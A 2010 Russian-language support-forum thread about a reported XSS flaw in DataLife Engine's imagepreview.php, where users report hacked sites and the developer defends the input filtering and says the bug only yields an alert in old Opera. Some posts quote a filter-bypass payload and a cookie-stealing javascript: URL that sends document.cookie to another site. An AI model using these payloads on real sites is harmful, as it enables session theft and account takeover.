AlcVitRes 2 Опубликовано: 26 мая 2010 Рассказать Опубликовано: 26 мая 2010 Здрасти, сегодня как в NWS, так и здесь заметил тему о.O XSS баге, в теорий (или на практике) позволяющую взломаться в DLE. Исправленна ли она в версий v8.5? (ступил = сносите пост). Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 26 мая 2010 Рассказать Опубликовано: 26 мая 2010 AlcVitRes, ссылки на варезные сайты удалил. Но о чем идет речь непонятно. Цитата Ссылка на сообщение Поделиться на других сайтах
zgr 72 Опубликовано: 27 мая 2010 Рассказать Опубликовано: 27 мая 2010 AlcVitRes, ссылки на варезные сайты удалил. Но о чем идет речь непонятно. Дело в том, что в админку нельзя войти одновременно с двух страниц браузера (не важно, это один и тот же браузер, на котором вы открываете еще одну страницу админки или совершенно другой). Если кто-то зашел в админку с одной страницы браузера, то уже никто не сможет зайти в админку с другой страницы этого или любого другого браузера этого или любого другого компьютера. Надеюсь, доходно написал, сам чуть не запутался В общем, этот бред клепают везде для всех камээсок, якобы от стороннего взлома сайта - ерунда какая-то Цитата Ссылка на сообщение Поделиться на других сайтах
sergey_1993 1 Опубликовано: 28 мая 2010 Рассказать Опубликовано: 28 мая 2010 Вчера вечером и сегодня утром ломанули уже около 5сайтов через XSS :angry: Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 28 мая 2010 Рассказать Опубликовано: 28 мая 2010 Вчера вечером и сегодня утром ломанули уже около 5сайтов через XSS Бред чистой воды, через XSS взломать сайт невозможно даже в теории. DLE использует специальный тип куков, доступ к которым через JS получить невозможно. А то что взламывают пачками сайты на нелегальных копиях скрипта, это не удивительно, там бекдоров и троянов напичкано, по уши. Цитата Ссылка на сообщение Поделиться на других сайтах
mitriy 5 Опубликовано: 28 мая 2010 Рассказать Опубликовано: 28 мая 2010 Вчера вечером и сегодня утром ломанули уже около 5сайтов через X а что в логах сервера? юзерагент опера, а обращения были к engine/modules/imagepreview.php?image= ? меня недавно долбили долго и упорно на предмет куков по этому адресу, но вроде мимо. Цитата Ссылка на сообщение Поделиться на других сайтах
TVampire 0 Опубликовано: 28 мая 2010 Рассказать Опубликовано: 28 мая 2010 Короче говоря, сейчас появились проги, которые рассылают пользователям спам-сообщения. Сегодня столкнулся с этим на своем и на парочке чужих сайтов на ДЛЕ (Движок 8.3) Цитата Ссылка на сообщение Поделиться на других сайтах
sergey_1993 1 Опубликовано: 28 мая 2010 Рассказать Опубликовано: 28 мая 2010 Короче говоря, сейчас появились проги, которые рассылают пользователям спам-сообщения. Сегодня столкнулся с этим на своем и на парочке чужих сайтов на ДЛЕ (Движок 8.3) Ты ошибся темой http://forum.dle-news.ru/index.php?showtopic=51133 Цитата Ссылка на сообщение Поделиться на других сайтах
kzpromo 1 Опубликовано: 29 мая 2010 Рассказать Опубликовано: 29 мая 2010 DLE ломали, ломают и будут ломать Совершенству нет предела как говорит один чел Цитата Ссылка на сообщение Поделиться на других сайтах
sergey_1993 1 Опубликовано: 29 мая 2010 Рассказать Опубликовано: 29 мая 2010 (изменено) http://dle-club.ru/dle/fix/565-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html Изменено 29 мая 2010 пользователем sergey_1993 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 29 мая 2010 Рассказать Опубликовано: 29 мая 2010 sergey_1993, Очень давно не актуально и патч для абсолютно старых версий скрипта, т.к. тех переменных в скрипте давано нет. В DLE в этом файле есть такая строчка: if ( !$user_group[$member_id['user_group']]['allow_all_edit'] ) $author = $member_id['name']; которая полностью исключает манипулирования с чужими файлами, если нет соответствующего доступа. Цитата Ссылка на сообщение Поделиться на других сайтах
dleua 4 Опубликовано: 29 мая 2010 Рассказать Опубликовано: 29 мая 2010 Я так понял, начались каникулы, и школота начинает воду мутить. Цитата Ссылка на сообщение Поделиться на других сайтах
demon165 8 Опубликовано: 30 мая 2010 Рассказать Опубликовано: 30 мая 2010 вообще идёт взлом через engine/modules/imagepreview.php через вызов в опере engine/modules/imagepreview.php?image=jajavascriptvascript:alert(dodocument.cookiecument.cookie) актуальна для версий оперы 9.х Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 30 мая 2010 Рассказать Опубликовано: 30 мая 2010 demiant, Ну попробуйте взломать. Чтобы что то взломать куки нужно злоумышленнику передать, а не чтобы он сам у себя вызвал alert, а теперь попройте создать запрос на передачу данных Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 30 мая 2010 Рассказать Опубликовано: 30 мая 2010 demiant, попробовал сделать, что-то подобное и не работает http://site.ru/engine/modules/imagepreview.php?image=javascript:location.href='http://site.ru/index.php?cookie='+document.cookie+'' Или надо как-то иначе? Цитата Ссылка на сообщение Поделиться на других сайтах
demi0s 0 Опубликовано: 3 июня 2010 Рассказать Опубликовано: 3 июня 2010 http://*********/forum/topic_6733/last#reply и как вы это объясните? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 3 июня 2010 Рассказать Опубликовано: 3 июня 2010 http://dle-news.ru/bags/v85/1037-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html Цитата Ссылка на сообщение Поделиться на других сайтах
demon165 8 Опубликовано: 4 июня 2010 Рассказать Опубликовано: 4 июня 2010 demiant, попробовал сделать, что-то подобное и не работает http://site.ru/engine/modules/imagepreview.php?image=javascript:location.href='http://site.ru/index.php?cookie='+document.cookie+'' Или надо как-то иначе? савргрупп на лицензии и именно так ломанули,там подстановка кукис через любой редактор куков в браузере,в файле engine/modules/imagepreview.php в самое начало кода добавить $_GET['image'] = strtolower($_GET['image']); фильтрация будет Цитата Ссылка на сообщение Поделиться на других сайтах
kzpromo 1 Опубликовано: 4 июня 2010 Рассказать Опубликовано: 4 июня 2010 блин с вами не интересно, уже все карты мои раскрыли Цитата Ссылка на сообщение Поделиться на других сайтах
Dj Dance 185 Опубликовано: 4 июня 2010 Рассказать Опубликовано: 4 июня 2010 Уязвимости все закрыты? Или как? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 4 июня 2010 Рассказать Опубликовано: 4 июня 2010 савргрупп на лицензии и именно так ломанули,там подстановка кукис через любой редактор куков в браузере,в файле engine/modules/imagepreview.php в самое начало кода добавить $_GET['image'] = strtolower($_GET['image']); фильтрация будет не подтвердается, в этом файле идет основная фильтрация по $_GET['image'] = @htmlspecialchars ($_GET['image'], ENT_QUOTES); if ( preg_match( "/[?&%<\[\]]/", $_GET['image']) ) { $_GET['image'] = ""; }[/code] строки [code]$_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] ); $_GET['image'] = str_replace( "javascript", "", $_GET['image'] ); это не основной фильтр. Максимум что можно сделать это безобидный alert и то в старой версии браузера опера. Уязвимость, это когда злоумышленник может получить куки, находясь удаленно, а получить их будучи лишенным любых кавычек, а также символов ?&% он не сможет. Алерт, безусловно в новой версии я уберу, дабы не искушать, но говорить о уязвимости в данном файле не приходится. Можете проверить, на dle-news.ru лежит обычный файл от версии 8.5, попробуйте получить доступ к сайту. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.